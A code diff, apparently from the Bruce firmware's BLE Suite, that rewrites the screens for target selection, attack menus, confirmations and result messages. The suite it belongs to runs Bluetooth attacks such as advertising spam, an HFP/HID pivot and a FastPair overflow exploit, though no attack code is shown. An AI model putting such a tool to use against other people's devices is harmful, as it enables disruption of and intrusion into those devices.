-            tft.setCursor(tftWidth - 25, menuStartY + (maxVisibleItems * menuItemHeight) - 20);
-            if (scrollOffset + maxVisibleItems < (int)deviceCount) tft.print("v");
+        tft.drawString(picked[idx] ? "[x]" : "[ ]", x, y, 1);
+        int cur = x + 4 * cw;
+        int right = x + w;
+        bleDrawRssi(right - 11, y, snapshot->rssi[idx], fg);
+        right -= 15;
+
+        String mac = snapshot->addresses[idx];
+        String name = snapshot->names[idx];
+        String tail = (mac.length() >= 5) ? mac.substring(mac.length() - 5) : mac;
+        int tailW = name.equalsIgnoreCase(mac) ? 0 : tft.textWidth(tail.c_str()) + 4;
+        if (right - cur < tailW + 8 * cw) tailW = 0;
+
+        tft.drawString(bleFit(name, right - cur - tailW), cur, y, 1);
+        if (tailW) {
+            tft.setTextColor(sel ? bruceConfig.bgColor : bleDim(), bg);
+            tft.drawRightString(tail, right, y, 1);
         }
+    };
 
-        tft.setTextColor(TFT_GREEN, bruceConfig.bgColor);
-        tft.setCursor(20, tftHeight - 30);
-        tft.print("SEL: Toggle  NEXT: Confirm  PREV: Select");
-        tft.setCursor(20, tftHeight - 20);
-        tft.print("ESC: Back");
-
-        if (check(EscPress)) {
-            delay(200);
-            exitMenu = true;
+    for (;;) {
+        int chosen = bleListLoop(title, rowCount, "SEL toggle  ESC cancel", row, &cursor);
+        if (chosen < 0) {
             targets.clear();
             return "";
-        } else if (check(PrevPress)) {
-            delay(150);
-            if (currentIndex > 0) {
-                currentIndex--;
-                if (currentIndex < scrollOffset) scrollOffset = currentIndex;
-            } else {
-                currentIndex = deviceCount - 1;
-                scrollOffset = std::max(0, (int)deviceCount - maxVisibleItems);
-            }
-        } else if (check(NextPress)) {
-            delay(150);
-            if (currentIndex < (int)deviceCount - 1) {
-                currentIndex++;
-                if (currentIndex >= scrollOffset + maxVisibleItems)
-                    scrollOffset = currentIndex - maxVisibleItems + 1;
-            } else {
-                currentIndex = 0;
-                scrollOffset = 0;
-            }
-        } else if (check(SelPress)) {
-            delay(200);
-            selected[currentIndex] = !selected[currentIndex];
-            if (selected[currentIndex]) {
-                targets.push_back(
-                    NimBLEAddress(std::string(snapshot->addresses[currentIndex].c_str()), BLE_ADDR_PUBLIC)
-                );
-            } else {
-                for (auto it = targets.begin(); it != targets.end(); ++it) {
-                    if (it->toString() == snapshot->addresses[currentIndex].c_str()) {
-                        targets.erase(it);
-                        break;
-                    }
+        }
+        if (chosen >= (int)deviceCount) break; // confirm row
+
+        picked[chosen] = !picked[chosen];
+        if (picked[chosen]) {
+            targets.push_back(
+                NimBLEAddress(std::string(snapshot->addresses[chosen].c_str()), BLE_ADDR_PUBLIC)
+            );
+        } else {
+            for (auto it = targets.begin(); it != targets.end(); ++it) {
+                if (it->toString() == snapshot->addresses[chosen].c_str()) {
+                    targets.erase(it);
+                    break;
                 }
             }
         }
-        delay(50);
     }
 
     if (targets.empty()) return "";
@@ -4881,26 +4801,9 @@ void runAdvertisingSpam(NimBLEAddress target) {
 static bool welcomeShown = false;
 
 void showWelcomeScreen() {
-    if (welcomeShown) return;
-
-    tft.fillScreen(bruceConfig.bgColor);
-    TouchFooter();
-    tft.setTextSize(4);
-    tft.setTextColor(TFT_PURPLE, bruceConfig.bgColor);
-    tft.setCursor((tftWidth - tft.textWidth("BRUCE")) / 2, 35);
-    tft.print("BRUCE");
-
-    tft.setTextColor(TFT_BLUE, bruceConfig.bgColor);
-    tft.setTextSize(2);
-    tft.setCursor((tftWidth - tft.textWidth("BLE SUITE")) / 2, 80);
-    tft.print("BLE SUITE");
-
-    tft.setTextColor(TFT_LIGHTGREY, bruceConfig.bgColor);
-    tft.setTextSize(1.5);
-    tft.setCursor((tftWidth - tft.textWidth("v3.1")) / 2, 100);
-    tft.print("v3.1");
-    delay(2000);
-
+    // The suite used to block for two seconds on a splash carrying its own
+    // hardcoded version number. Nothing else in Bruce does that, so the menu
+    // now opens straight away.
     welcomeShown = true;
 }
 
@@ -4935,59 +4838,13 @@ void BleSuiteMenu() {
         "BLE Sniffer"
     };
 
-    int selected = 0, scrollOffset = 0;
-    int lastSelected = -1, lastScrollOffset = -1;
-    int maxVisible = (tftHeight - 80) / 25;
+    int selected = 0;
 
     while (true) {
-        if (selected != lastSelected || scrollOffset != lastScrollOffset) {
-            tft.fillScreen(bruceConfig.bgColor);
-            TouchFooter();
-            tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
+        int choice =
+            bleListLoop("BLE Suite", MENU_ITEMS, "SEL run  ESC back", bleTextRow(menuItems), &selected);
 
-            tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-            tft.setTextSize(2);
-            tft.setCursor((tftWidth - tft.textWidth("BLE SUITE")) / 2, 15);
-            tft.print("BLE SUITE");
-            tft.setTextSize(1);
-
-            for (int i = 0; i < maxVisible && (scrollOffset + i) < MENU_ITEMS; i++) {
-                int idx = scrollOffset + i;
-                int yPos = 60 + (i * 25);
-
-                if (idx == selected) {
-                    tft.fillRect(20, yPos, tftWidth - 40, 20, TFT_WHITE);
-                    tft.setTextColor(TFT_BLACK, TFT_WHITE);
-                    tft.setCursor(25, yPos + 5);
-                    tft.print("> ");
-                } else {
-                    tft.fillRect(20, yPos, tftWidth - 40, 20, bruceConfig.bgColor);
-                    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-                    tft.setCursor(25, yPos + 5);
-                    tft.print("  ");
-                }
-                tft.print(String(idx + 1) + ". " + menuItems[idx]);
-            }
-
-            if (MENU_ITEMS > maxVisible) {
-                tft.setTextColor(TFT_CYAN, bruceConfig.bgColor);
-                tft.setCursor(tftWidth - 25, 65);
-                if (scrollOffset > 0) tft.print("^");
-                tft.setCursor(tftWidth - 25, 65 + (maxVisible * 25) - 10);
-                if (scrollOffset + maxVisible < MENU_ITEMS) tft.print("v");
-            }
-
-            tft.setTextColor(TFT_GREEN, bruceConfig.bgColor);
-            tft.setCursor(20, tftHeight - 30);
-            tft.print("SEL: Select  PREV/NEXT: Navigate");
-            tft.setCursor(20, tftHeight - 20);
-            tft.print("ESC: Back");
-
-            lastSelected = selected;
-            lastScrollOffset = scrollOffset;
-        }
-
-        if (check(EscPress)) {
+        if (choice < 0) {
             // Clear data when exiting the menu
             if (g_pBLEScan) {
                 g_pBLEScan->stop();
@@ -5002,27 +4859,9 @@ void BleSuiteMenu() {
             BLEStateManager::deinitBLE(true);
             return;
         }
-        if (check(PrevPress)) {
-            selected = (selected > 0) ? selected - 1 : MENU_ITEMS - 1;
-            if (selected < scrollOffset) scrollOffset = selected;
-            if (selected >= scrollOffset + maxVisible) scrollOffset = selected - maxVisible + 1;
-            delay(150);
-        }
-        if (check(NextPress)) {
-            selected = (selected < MENU_ITEMS - 1) ? selected + 1 : 0;
-            if (selected < scrollOffset) scrollOffset = selected;
-            if (selected >= scrollOffset + maxVisible) scrollOffset = selected - maxVisible + 1;
-            delay(150);
-        }
-        if (check(SelPress)) {
-            if (selected == MENU_ITEMS - 1) {
-                BLE_Sniffer();
-            } else {
-                executeAttackWithTargetScan(selected);
-            }
-            lastSelected = -1;
-        }
-        delay(50);
+
+        if (choice == MENU_ITEMS - 1) BLE_Sniffer();
+        else executeAttackWithTargetScan(choice);
     }
 }
 
@@ -5089,92 +4928,13 @@ void executeAttackWithTargetScan(int attackIndex) {
 //=============================================================================
 
 int showSubMenu(const char *title, const char *options[], int optionCount) {
-    tft.fillScreen(bruceConfig.bgColor);
-    TouchFooter();
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
-
-    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-    tft.setTextSize(2);
-    tft.setTextWrap(true, true);
-    tft.setCursor((tftWidth - tft.textWidth(title)) / 2, 15);
-    tft.print(title);
-    tft.setTextSize(1);
-
-    int selected = 0, scrollOffset = 0;
-    int lastSelected = -1, lastScrollOffset = -1;
-    int maxVisible = (tftHeight - 80) / 25;
-
-    while (true) {
-        if (selected != lastSelected || scrollOffset != lastScrollOffset) {
-            tft.fillRect(20, 60, tftWidth - 40, tftHeight - 115, bruceConfig.bgColor);
-
-            for (int i = 0; i < maxVisible && (scrollOffset + i) < optionCount; i++) {
-                int idx = scrollOffset + i;
-                int yPos = 60 + (i * 25);
-
-                int availWidth = (tftWidth - 40) - 20;
-
-                String displayText = options[idx];
-
-                if (tft.textWidth(displayText.c_str()) > availWidth) {
-                    String ellipsis = "...";
-                    int ellipsisWidth = tft.textWidth(ellipsis.c_str());
-                    while (displayText.length() > 0 &&
-                           tft.textWidth(displayText.c_str()) + ellipsisWidth > availWidth) {
-                        displayText.remove(displayText.length() - 1);
-                    }
-                    displayText += ellipsis;
-                }
-
-                if (idx == selected) {
-                    tft.fillRect(20, yPos, tftWidth - 40, 20, TFT_WHITE);
-                    tft.setTextColor(TFT_BLACK, TFT_WHITE);
-                    tft.setCursor(25, yPos + 5);
-                    tft.print("> ");
-                } else {
-                    tft.fillRect(20, yPos, tftWidth - 40, 20, bruceConfig.bgColor);
-                    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-                    tft.setCursor(25, yPos + 5);
-                    tft.print("  ");
-                }
-                tft.print(displayText);
-            }
-
-            if (optionCount > maxVisible) {
-                tft.setTextColor(TFT_CYAN, bruceConfig.bgColor);
-                tft.setCursor(tftWidth - 25, 65);
-                if (scrollOffset > 0) tft.print("^");
-                tft.setCursor(tftWidth - 25, 65 + (maxVisible * 25) - 10);
-                if (scrollOffset + maxVisible < optionCount) tft.print("v");
-            }
-
-            tft.setTextColor(TFT_GREEN, bruceConfig.bgColor);
-            tft.setCursor(20, tftHeight - 30);
-            tft.print("SEL: Select  PREV/NEXT: Navigate");
-            tft.setCursor(20, tftHeight - 20);
-            tft.print("ESC: Back");
-
-            lastSelected = selected;
-            lastScrollOffset = scrollOffset;
-        }
-
-        if (check(EscPress)) return -1;
-        if (check(PrevPress)) {
-            selected = (selected > 0) ? selected - 1 : optionCount - 1;
-            if (selected < scrollOffset) scrollOffset = selected;
-            if (selected >= scrollOffset + maxVisible) scrollOffset = selected - maxVisible + 1;
-            delay(150);
-        }
-        if (check(NextPress)) {
-            selected = (selected < optionCount - 1) ? selected + 1 : 0;
-            if (selected < scrollOffset) scrollOffset = selected;
-            if (selected >= scrollOffset + maxVisible) scrollOffset = selected - maxVisible + 1;
-            delay(150);
-        }
-        if (check(SelPress)) return selected;
-
-        delay(50);
-    }
+    // Carry the chosen target into the hint line so the submenus stop hiding
+    // which device the attack is aimed at.
+    String hint = g_selectedDevice.address.isEmpty()
+                      ? String("SEL run  ESC back")
+                      : ("> " + (g_selectedDevice.name.length() ? g_selectedDevice.name
+                                                                : g_selectedDevice.address));
+    return bleListLoop(title, optionCount, hint, bleTextRow(options));
 }
 
 //=============================================================================
@@ -5949,217 +5709,97 @@ void runHFPHIDPivotAttack(NimBLEAddress target) {
 // UI Helpers
 //=============================================================================
 
-void showAttackProgress(const char *message, uint16_t color) {
-    tft.fillScreen(bruceConfig.bgColor);
-    TouchFooter();
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
-
-    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-    tft.setTextSize(2);
-    tft.setCursor((tftWidth - tft.textWidth("BLE SUITE")) / 2, 15);
-    tft.print("BLE SUITE");
-    tft.setTextSize(1);
-
-    tft.setTextColor(color, bruceConfig.bgColor);
-
-    String msg = message;
-    int maxWidth = tftWidth - 40;
-    int lineHeight = 20;
-    int yPos = 80;
+// Wraps `text` inside the list area, measuring glyphs rather than assuming a
+// 6px cell. Returns the y just past the last line drawn.
+static int bleWrapText(const String &text, int x, int y, int w, int bottom) {
+    tft.setTextSize(FP);
+    int lh = 8 * FP + 2;
     int start = 0;
-    int len = msg.length();
-
-    while (start < len) {
-        int end = start;
-        int lastSpace = -1;
-
-        while (end < len && (end - start) * 6 < maxWidth) {
-            if (msg.charAt(end) == ' ') lastSpace = end;
+    const int len = text.length();
+    while (start < len && y + lh <= bottom) {
+        int end = start, lastSpace = -1;
+        while (end < len) {
+            if (text.charAt(end) == ' ') lastSpace = end;
+            if (tft.textWidth(text.substring(start, end + 1).c_str()) > w) break;
             end++;
         }
+        int cut = (end >= len) ? len : (lastSpace > start ? lastSpace : end);
+        tft.drawString(text.substring(start, cut), x, y, 1);
+        y += lh;
+        start = (cut < len && text.charAt(cut) == ' ') ? cut + 1 : cut;
+    }
+    return y;
+}
 
-        if (end == len || lastSpace == -1) {
-            tft.setCursor(20, yPos);
-            tft.print(msg.substring(start, end));
-            start = end;
-        } else {
-            tft.setCursor(20, yPos);
-            tft.print(msg.substring(start, lastSpace));
-            start = lastSpace + 1;
-        }
-        yPos += lineHeight;
-        if (yPos > tftHeight - 60) break;
+void showAttackProgress(const char *message, uint16_t color) {
+    BleUiGeom g = bleUiGeom();
+    static uint8_t spinnerPos = 0;
+    static String lastMsg;
+    String msg = message ? String(message) : String("");
+
+    // Only repaint the frame when the message actually changes; the spinner
+    // used to be redrawn under a full-screen clear, so it flashed instead of
+    // turning.
+    if (msg != lastMsg) {
+        lastMsg = msg;
+        drawMainBorderWithTitle("BLE Suite");
+        // same reasoning as the results screen: the caller's colour is a hint,
+        // not something to paint text with
+        tft.setTextColor(bleSeverity(color), bruceConfig.bgColor);
+        bleWrapText(msg, g.listL, g.top, g.listW - 12, g.footY - 2);
+        tft.setTextColor(bleDim(), bruceConfig.bgColor);
+        tft.drawString("working...", g.listL, g.footY, 1);
     }
 
-    static uint8_t spinnerPos = 0;
     const char *spinner = "|/-\\";
-    tft.setCursor(tftWidth - 40, 80);
-    tft.print(spinner[spinnerPos % 4]);
-    spinnerPos++;
-
-    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-    tft.setCursor(20, tftHeight - 30);
-    tft.print("Please wait...");
+    tft.setTextSize(FP);
+    tft.setTextColor(bruceConfig.priColor, bruceConfig.bgColor);
+    tft.drawString(String(spinner[spinnerPos++ % 4]), g.listL + g.listW - FP * LW, g.footY, 1);
 }
 
 void showAttackResult(bool success, const char *message) {
-    if (success) {
-        tft.fillScreen(TFT_GREEN);
-        TouchFooter();
-        tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_BLACK);
-        tft.setTextColor(TFT_WHITE, TFT_GREEN);
-        tft.setTextSize(2);
-        tft.setCursor((tftWidth - tft.textWidth("SUCCESS")) / 2, 15);
-        tft.print("SUCCESS");
-        tft.setTextSize(1);
-        tft.setTextColor(TFT_BLACK, TFT_GREEN);
-    } else {
-        tft.fillScreen(TFT_RED);
-        TouchFooter();
-        tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_BLACK);
-        tft.setTextColor(TFT_WHITE, TFT_RED);
-        tft.setTextSize(2);
-        tft.setCursor((tftWidth - tft.textWidth("FAILED")) / 2, 15);
-        tft.print("FAILED");
-        tft.setTextSize(1);
-        tft.setTextColor(TFT_WHITE, TFT_RED);
-    }
-
-    tft.setTextColor(success ? TFT_BLACK : TFT_WHITE, success ? TFT_GREEN : TFT_RED);
-
-    if (message) {
-        String msg = message;
-        int maxWidth = tftWidth - 40;
-        int lineHeight = 20;
-        int yPos = 80;
-        int start = 0;
-        int len = msg.length();
-
-        while (start < len) {
-            int end = start;
-            int lastSpace = -1;
-
-            while (end < len && (end - start) * 6 < maxWidth) {
-                if (msg.charAt(end) == ' ') lastSpace = end;
-                end++;
-            }
-
-            if (end == len || lastSpace == -1) {
-                tft.setCursor(20, yPos);
-                tft.print(msg.substring(start, end));
-                start = end;
-            } else {
-                tft.setCursor(20, yPos);
-                tft.print(msg.substring(start, lastSpace));
-                start = lastSpace + 1;
-            }
-            yPos += lineHeight;
-            if (yPos > tftHeight - 100) break;
-        }
-    } else {
-        tft.setCursor(20, 80);
-        tft.print(success ? "Attack successful!" : "Attack failed");
-    }
-
-    tft.setTextColor(TFT_WHITE, success ? TFT_GREEN : TFT_RED);
-    tft.setCursor(20, tftHeight - 35);
-    tft.print("SEL: Continue  ESC: Back");
-
-    while (!check(SelPress) && !check(EscPress)) delay(50);
-    delay(200);
+    String msg = message ? String(message) : String(success ? "Attack successful" : "Attack failed");
+    if (success) displaySuccess(msg, true);
+    else displayError(msg, true);
 }
 
 bool confirmAttack(const char *targetName) {
-    tft.fillScreen(bruceConfig.bgColor);
-    TouchFooter();
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
+    BleUiGeom g = bleUiGeom();
+    drawMainBorderWithTitle("Confirm Attack");
+    tft.setTextSize(FP);
 
-    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-    tft.setTextSize(2);
-    tft.setCursor((tftWidth - tft.textWidth("CONFIRM ATTACK")) / 2, 15);
-    tft.print("CONFIRM ATTACK");
-    tft.setTextSize(1);
-
-    tft.setCursor(20, 60);
-    tft.print("Target: ");
-
-    String targetStr = targetName;
-    if (targetStr.length() > 30) {
-        tft.println(targetStr.substring(0, 27) + "...");
-    } else {
-        tft.println(targetStr);
+    tft.setTextColor(bleDim(), bruceConfig.bgColor);
+    tft.drawString("Target", g.listL, g.top, 1);
+    tft.setTextColor(bruceConfig.priColor, bruceConfig.bgColor);
+    tft.drawString(bleFit(String(targetName), g.listW), g.listL, g.top + g.rowH, 1);
+    if (g_selectedDevice.name.length() && !g_selectedDevice.name.equalsIgnoreCase(targetName)) {
+        tft.drawString(bleFit(g_selectedDevice.name, g.listW), g.listL, g.top + 2 * g.rowH, 1);
     }
 
-    tft.setCursor(20, 90);
-    tft.println("FastPair buffer overflow exploit");
+    tft.setTextColor(bleDim(), bruceConfig.bgColor);
+    tft.drawString("SEL yes   NEXT/ESC no", g.listL, g.footY, 1);
 
-    tft.setTextColor(TFT_GREEN, bruceConfig.bgColor);
-    tft.setCursor(20, tftHeight - 30);
-    tft.print("SEL: Yes  NEXT: No  ESC: Cancel");
-
-    while (true) {
-        if (check(EscPress)) return false;
+    for (;;) {
+        if (check(EscPress) || check(NextPress)) return false;
         if (check(SelPress)) return true;
-        if (check(NextPress)) return false;
-        delay(50);
+        vTaskDelay(20 / portTICK_PERIOD_MS);
     }
 }
 
 bool requireSimpleConfirmation(const char *message) {
-    tft.fillScreen(bruceConfig.bgColor);
-    TouchFooter();
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
+    BleUiGeom g = bleUiGeom();
+    drawMainBorderWithTitle("Confirm");
+    tft.setTextColor(bruceConfig.priColor, bruceConfig.bgColor);
+    bleWrapText(String(message), g.listL, g.top, g.listW - 12, g.footY - 2);
 
-    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-    tft.setTextSize(2);
-    tft.setCursor((tftWidth - tft.textWidth("CONFIRM")) / 2, 15);
-    tft.print("CONFIRM");
-    tft.setTextSize(1);
+    tft.setTextSize(FP);
+    tft.setTextColor(bleDim(), bruceConfig.bgColor);
+    tft.drawString("SEL yes   NEXT/ESC no", g.listL, g.footY, 1);
 
-    tft.fillRect(20, 50, tftWidth - 40, 80, bruceConfig.bgColor);
-    tft.setCursor(20, 60);
-    String msgStr = message;
-
-    int maxWidth = tftWidth - 40;
-    int lineHeight = 20;
-    int yPos = 60;
-    int start = 0;
-    int len = msgStr.length();
-
-    while (start < len) {
-        int end = start;
-        int lastSpace = -1;
-
-        while (end < len && (end - start) * 6 < maxWidth) {
-            if (msgStr.charAt(end) == ' ') lastSpace = end;
-            end++;
-        }
-
-        if (end == len || lastSpace == -1) {
-            tft.setCursor(20, yPos);
-            tft.print(msgStr.substring(start, end));
-            start = end;
-        } else {
-            tft.setCursor(20, yPos);
-            tft.print(msgStr.substring(start, lastSpace));
-            start = lastSpace + 1;
-        }
-        yPos += lineHeight;
-        if (yPos > 130) break;
-    }
-
-    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-    tft.setCursor(20, tftHeight - 35);
-    tft.print("SEL: OK  ESC: Cancel");
-
-    while (true) {
-        if (check(EscPress)) {
-            showAttackProgress("Cancelled", TFT_WHITE);
-            delay(1000);
-            return false;
-        }
+    for (;;) {
+        if (check(EscPress) || check(NextPress)) return false;
         if (check(SelPress)) return true;
-        delay(50);
+        vTaskDelay(20 / portTICK_PERIOD_MS);
     }
 }
 
@@ -6167,325 +5807,120 @@ int8_t showAdaptiveMessage(
     const char *line1, const char *btn1, const char *btn2, const char *btn3, uint16_t color, bool showEscHint,
     bool autoProgress
 ) {
+    // The hint line used to be drawn with TFT_BLACK on the theme background,
+    // i.e. invisible on every dark theme, and the body wrapped against a
+    // hardcoded y = 140 ceiling.
+    (void)showEscHint;
     int buttonCount = 0;
     if (strlen(btn1) > 0) buttonCount++;
     if (strlen(btn2) > 0) buttonCount++;
     if (strlen(btn3) > 0) buttonCount++;
 
-    tft.fillScreen(bruceConfig.bgColor);
-    TouchFooter();
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
-    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-    tft.setTextSize(2);
-    tft.setCursor((tftWidth - tft.textWidth("MESSAGE")) / 2, 15);
-    tft.print("MESSAGE");
-    tft.setTextSize(1);
+    BleUiGeom g = bleUiGeom();
+    const uint16_t sev = bleSeverity(color);
+    const int barW = 3;
+    const int textX = g.listL + barW + 4;
 
-    tft.setTextColor(color, bruceConfig.bgColor);
+    drawMainBorderWithTitle("BLE Suite");
+    tft.fillRect(g.listL, g.top - 2, barW, g.rows * g.rowH, sev);
 
-    String lineStr = line1;
-    int maxWidth = tftWidth - 40;
-    int lineHeight = 20;
-    int yPos = 70;
-    int start = 0;
-    int len = lineStr.length();
-
-    while (start < len) {
-        int end = start;
-        int lastSpace = -1;
-
-        while (end < len && (end - start) * 6 < maxWidth) {
-            if (lineStr.charAt(end) == ' ') lastSpace = end;
-            end++;
-        }
-
-        if (end == len || lastSpace == -1) {
-            tft.setCursor(20, yPos);
-            tft.print(lineStr.substring(start, end));
-            start = end;
-        } else {
-            tft.setCursor(20, yPos);
-            tft.print(lineStr.substring(start, lastSpace));
-            start = lastSpace + 1;
-        }
-        yPos += lineHeight;
-        if (yPos > 140) break;
+    std::vector<String> rows;
+    bleWrapInto(String(line1), g.listW - barW - 4, rows);
+    tft.setTextSize(FP);
+    tft.setTextColor(bruceConfig.priColor, bruceConfig.bgColor);
+    for (int i = 0; i < g.rows && i < (int)rows.size(); i++) {
+        tft.drawString(rows[i], textX, g.top + i * g.rowH, 1);
     }
 
-    tft.setTextColor(TFT_BLACK, bruceConfig.bgColor);
-    tft.setCursor(20, tftHeight - 35);
+    String hint;
+    if (buttonCount == 0) hint = autoProgress ? "" : "any key to continue";
+    else if (buttonCount == 1) hint = String("SEL ") + btn1 + "   ESC cancel";
+    else {
+        hint = String("SEL ") + btn1 + "  NEXT " + btn2;
+        if (buttonCount > 2) hint += String("  PREV ") + btn3;
+        hint += "  ESC cancel";
+    }
+    tft.setTextColor(bleDim(), bruceConfig.bgColor);
+    tft.drawString(bleFit(hint, g.listW), g.listL, g.footY, 1);
 
-    if (buttonCount == 0) {
-        if (autoProgress) {
-            delay(1500);
-            return 0;
-        }
-        tft.print("Press any key to continue...");
-        while (true) {
-            if (check(EscPress) || check(SelPress) || check(PrevPress) || check(NextPress)) {
-                delay(200);
-                return 0;
-            }
-            delay(50);
-        }
-    } else if (buttonCount == 1) {
-        tft.print("SEL: Select  ESC: Cancel");
-        while (true) {
-            if (check(EscPress)) {
-                delay(200);
-                return -1;
-            }
-            if (check(SelPress)) {
-                delay(200);
-                return 0;
-            }
-            delay(50);
-        }
-    } else {
-        tft.print("SEL: Btn1  NEXT: Btn2  ESC: Cancel");
-        while (true) {
-            if (check(EscPress)) {
-                delay(200);
-                return -1;
-            }
-            if (check(SelPress)) {
-                delay(200);
-                return 0;
-            }
-            if (check(NextPress)) {
-                delay(200);
-                return 1;
-            }
-            if (buttonCount > 2 && check(PrevPress)) {
-                delay(200);
-                return 2;
-            }
-            delay(50);
-        }
+    if (buttonCount == 0 && autoProgress) {
+        delay(1500);
+        return 0;
+    }
+
+    for (;;) {
+        if (check(EscPress)) return buttonCount == 0 ? 0 : -1;
+        if (check(SelPress)) return 0;
+        if (buttonCount >= 2 && check(NextPress)) return 1;
+        if (buttonCount > 2 && check(PrevPress)) return 2;
+        if (buttonCount == 0 && (check(NextPress) || check(PrevPress))) return 0;
+        vTaskDelay(20 / portTICK_PERIOD_MS);
     }
 }
 
-void showWarningMessage(const char *message) {
-    tft.fillScreen(TFT_YELLOW);
-    TouchFooter();
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_BLACK);
-    tft.setTextColor(TFT_BLACK, TFT_YELLOW);
-    tft.setTextSize(2);
-    tft.setCursor((tftWidth - tft.textWidth("WARNING")) / 2, 15);
-    tft.print("WARNING");
-    tft.setTextSize(1);
-    tft.setTextColor(TFT_BLACK, TFT_YELLOW);
-    tft.fillRect(20, 60, tftWidth - 40, 100, TFT_YELLOW);
+void showWarningMessage(const char *message) { displayWarning(String(message), true); }
 
-    String msgStr = message;
-    int maxWidth = tftWidth - 40;
-    int lineHeight = 20;
-    int yPos = 70;
-    int start = 0;
-    int len = msgStr.length();
+void showErrorMessage(const char *message) { displayError(String(message), true); }
 
-    while (start < len) {
-        int end = start;
-        int lastSpace = -1;
-
-        while (end < len && (end - start) * 6 < maxWidth) {
-            if (msgStr.charAt(end) == ' ') lastSpace = end;
-            end++;
-        }
-
-        if (end == len || lastSpace == -1) {
-            tft.setCursor(20, yPos);
-            tft.print(msgStr.substring(start, end));
-            start = end;
-        } else {
-            tft.setCursor(20, yPos);
-            tft.print(msgStr.substring(start, lastSpace));
-            start = lastSpace + 1;
-        }
-        yPos += lineHeight;
-        if (yPos > 160) break;
-    }
-
-    tft.setTextColor(TFT_BLACK, TFT_YELLOW);
-    tft.setCursor(20, tftHeight - 35);
-    tft.print("Press any key to continue...");
-
-    while (true) {
-        if (check(EscPress) || check(SelPress) || check(PrevPress) || check(NextPress)) {
-            delay(200);
-            return;
-        }
-        delay(50);
-    }
-}
-
-void showErrorMessage(const char *message) {
-    tft.fillScreen(TFT_RED);
-    TouchFooter();
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_BLACK);
-    tft.setTextColor(TFT_WHITE, TFT_RED);
-    tft.setTextSize(2);
-    tft.setCursor((tftWidth - tft.textWidth("ERROR")) / 2, 15);
-    tft.print("ERROR");
-    tft.setTextSize(1);
-    tft.setTextColor(TFT_WHITE, TFT_RED);
-    tft.fillRect(20, 60, tftWidth - 40, 100, TFT_RED);
-
-    String msgStr = message;
-    int maxWidth = tftWidth - 40;
-    int lineHeight = 20;
-    int yPos = 70;
-    int start = 0;
-    int len = msgStr.length();
-
-    while (start < len) {
-        int end = start;
-        int lastSpace = -1;
-
-        while (end < len && (end - start) * 6 < maxWidth) {
-            if (msgStr.charAt(end) == ' ') lastSpace = end;
-            end++;
-        }
-
-        if (end == len || lastSpace == -1) {
-            tft.setCursor(20, yPos);
-            tft.print(msgStr.substring(start, end));
-            start = end;
-        } else {
-            tft.setCursor(20, yPos);
-            tft.print(msgStr.substring(start, lastSpace));
-            start = lastSpace + 1;
-        }
-        yPos += lineHeight;
-        if (yPos > 160) break;
-    }
-
-    tft.setCursor(20, tftHeight - 35);
-    tft.print("Press any key to continue...");
-
-    while (true) {
-        if (check(EscPress) || check(SelPress) || check(PrevPress) || check(NextPress)) {
-            delay(200);
-            return;
-        }
-        delay(50);
-    }
-}
-
-void showSuccessMessage(const char *message) {
-    tft.fillScreen(TFT_GREEN);
-    TouchFooter();
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_BLACK);
-    tft.setTextColor(TFT_WHITE, TFT_GREEN);
-    tft.setTextSize(2);
-    tft.setCursor((tftWidth - tft.textWidth("SUCCESS")) / 2, 15);
-    tft.print("SUCCESS");
-    tft.setTextSize(1);
-    tft.setTextColor(TFT_BLACK, TFT_GREEN);
-    tft.fillRect(20, 60, tftWidth - 40, 100, TFT_GREEN);
-
-    String msgStr = message;
-    int maxWidth = tftWidth - 40;
-    int lineHeight = 20;
-    int yPos = 70;
-    int start = 0;
-    int len = msgStr.length();
-
-    while (start < len) {
-        int end = start;
-        int lastSpace = -1;
-
-        while (end < len && (end - start) * 6 < maxWidth) {
-            if (msgStr.charAt(end) == ' ') lastSpace = end;
-            end++;
-        }
-
-        if (end == len || lastSpace == -1) {
-            tft.setCursor(20, yPos);
-            tft.print(msgStr.substring(start, end));
-            start = end;
-        } else {
-            tft.setCursor(20, yPos);
-            tft.print(msgStr.substring(start, lastSpace));
-            start = lastSpace + 1;
-        }
-        yPos += lineHeight;
-        if (yPos > 160) break;
-    }
-
-    tft.setCursor(20, tftHeight - 35);
-    tft.print("Press any key to continue...");
-
-    while (true) {
-        if (check(EscPress) || check(SelPress) || check(PrevPress) || check(NextPress)) {
-            delay(200);
-            return;
-        }
-        delay(50);
-    }
-}
+void showSuccessMessage(const char *message) { displaySuccess(String(message), true); }
 
 void showDeviceInfoScreen(
     const char *title, const std::vector<String> &lines, uint16_t bgColor, uint16_t textColor
 ) {
-    tft.fillScreen(bgColor);
-    TouchFooter();
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
+    // textColor is ignored on purpose: six call sites pass TFT_BLACK, which was
+    // legible only against the solid colour this screen used to flood the panel
+    // with. Body text now always uses the theme foreground, and the severity the
+    // caller meant to convey moves to a marker down the left edge.
+    (void)textColor;
 
-    tft.setTextColor(TFT_WHITE, bgColor);
-    tft.setTextSize(2);
-    tft.setCursor((tftWidth - tft.textWidth(title)) / 2, 15);
-    tft.print(title);
-    tft.setTextSize(1);
+    BleUiGeom g = bleUiGeom();
